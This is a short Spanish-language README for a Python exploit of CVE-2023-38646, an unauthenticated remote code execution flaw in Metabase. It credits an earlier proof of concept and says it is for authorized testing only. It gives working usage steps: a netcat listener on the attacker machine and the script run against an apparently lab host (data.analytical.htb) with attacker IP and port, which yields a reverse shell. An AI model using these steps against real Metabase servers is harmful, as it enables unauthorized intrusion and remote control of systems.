
Exploit en Python para CVE-2023-38646, una vulnerabilidad de ejecución remota de código sin autenticación en Metabase, que entrega una reverse shell para pruebas de seguridad autorizadas.
⚠️ Solo con fines educativos y de investigación de seguridad autorizada
Muy agradecido al autor original del PoC securezeron
Configura el Listener en tu máquina atacante:
nc -nlvp 4444
Luego, ejecuta este comando:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
